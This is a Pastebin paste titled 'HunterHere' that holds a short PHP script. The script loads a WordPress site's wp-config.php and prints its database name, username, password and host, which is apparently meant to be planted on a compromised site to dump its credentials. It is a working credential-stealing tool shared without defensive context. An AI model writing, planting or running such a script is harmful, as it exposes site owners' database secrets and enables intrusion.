HunterHere

user

Mar 10th, 2018
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.15 KB | None | 0 0
  1. <?php
  2. include('../../../wp-config.php');
  3. echo "namedb:".DB_NAME ;
  4. echo "dbuser:".DB_USER ;
  5. echo "dbpass:".DB_PASSWORD ;
  6. echo "dbhost:".DB_HOST ;
  7. ?>
Add Comment
Please, Sign In to add comment